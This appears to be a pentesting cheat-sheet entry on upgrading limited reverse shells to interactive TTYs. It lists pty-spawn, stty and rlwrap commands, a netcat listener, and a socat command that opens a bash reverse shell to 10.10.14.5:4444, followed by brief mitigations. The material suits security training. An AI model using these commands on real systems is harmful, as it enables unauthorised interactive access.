Shell Upgrade Tty

Overview

TTY Shell Upgrades turn limited reverse shells (typically from netcat or Python one-liners) into fully interactive terminals with job control, terminal echo, and proper line editing. This is essential for using interactive tools like sudo, vim, or text editors.

Multiple techniques exist for upgrading partial shells depending on available tools on the target system.

Category: Shells & Payloads — Reverse shells, bind shells, and payload generation.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Shell Upgrade Tty:

python3 -c 'import pty;pty.spawn("/bin/bash")'

script /dev/null -c bash

echo os.system('/bin/bash')

/usr/bin/expect -c 'spawn bash;interact'

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.5:4444

rlwrap nc -lvnp 4444

stty raw -echo; fg (after Ctrl+Z on listener)

stty rows 40 cols 130

export TERM=xterm-256color

export SHELL=bash

Tools & Techniques

Recommended tools for Shell Upgrade Tty:

• Python PTY: python3/2 -c 'import pty;pty.spawn("/bin/bash")'
• Script: script /dev/null -c bash
• Socat: full TTY with socat exec
• rlwrap: readline wrapper for netcat
• stty: terminal size configuration after raw mode

Prevention & Mitigation

Security recommendations to prevent Shell Upgrade Tty:

• Monitor for TTY upgrade activity (spawned shells)
• Restrict Python/script/socat execution where possible
• Use application whitelisting to block unauthorized interpreters

References

Additional resources:

• https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys
• https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/